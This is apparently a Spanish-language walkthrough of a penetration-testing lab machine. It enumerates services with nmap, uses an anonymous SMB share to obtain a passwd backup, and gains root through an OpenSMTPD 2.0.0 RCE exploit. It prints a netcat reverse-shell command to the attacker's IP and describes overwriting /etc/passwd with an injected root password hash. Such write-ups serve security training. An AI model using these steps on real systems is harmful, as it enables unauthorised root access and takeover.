MAQUINA BRATARINA (SMB null session + RCE 'OPENSMTPD 2.0.0') + (MODIFICACION passwd 'agregar password' + Subscribir archivo etc passwd)

Enumere los puertos abiertos:

nmap -p- --open -sS --min-rate 2000 -vvv -n -Pn 192.168.104.71 -oG Basicscan.txt

Luego ejecute unos script básicos de reconocimiento para determinar que servicios corren en estos puertos y sus posibles versiones.

nmap -p22,25,80,445 -sCV 192.168.104.71 -oN Fullnscan.txt

Con el siguiente comando ejecute unos scripts para verificar si los servicios son vulnerables.

nmap -p22,25,80,445 --script=vuln 192.168.104.71 -oN Vulnscan.txt

Me adentre al servidor web para realizar un reconocimiento.

Ingrese a cada apartado y no encontré nada.

Enumere el puerto smtp que corre por el puerto 25 utilizando el siguiente comando.

nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011

Encontré la versión del servicio smtp OPENSMTPD 2.0.0 esto me lo mostro tanto la enumeración con script de smpt como los script básicos como también un usuario "root"

Busque si existen exploits para esta versión del OPENSMTDP y encontré varios.

Luego antes de realizar la explotacion verifique el puerto 445 samba.

Para enumerar los archivos compartidos si es que hay, utilice enum4linux y smbclient.

enum4linux -a 192.168.109.71

smbclient -N -L 192.168.104.71

Con estas herramientas a través de una null sesión observe el contenido del samba encontrando una carpeta llamada backups.

Utilice el smbclient para ver el contenido y descargarlo.

smbclient //192.168.104.71/backups -N
    get passwd.bak

El archivo que encontré son los mismos de /etc/passwd. Vuelvo a los exploit y utilizo el exploit : 47984 (rce)

Este exploit requiere que le coloque la ip victima, el puerto y un comando.

Con el siguiente comando voy a realizar una revershell.

busybox nc 192.168.45.233 80 -e sh # revershell

En otra terminal me puse en escucha en el puerto que seleccione en la revershell y luego ejecuto el exploit.

Logre acceder a la maquina como usuario root.

MODO 2

Como tengo en mi posesión el archivo passwd lo modifique, esto con fin de agregarle una contraseña al usuario root con una que yo logre crear.

El primer que voy a realizar es crear una contraseña y hashearla.

openssl passwd -6 -salt my_salt password  # passwd es el archivo # password es la contraseña

Segundo agregue el hash obtenido al usuario root, para ello le quito la "x"

En tercer lugar aproveche que el exploit puede ejecutar comando, subir el archivo passwd y con el comando -O sobrescribí el archivo de /etc/passwd por "MI PASSWD QUE CONTIENE MI CONTRASEÑA"

Por ultimo a través del ssh logre acceder a la maquina proporcionándole mi contraseña.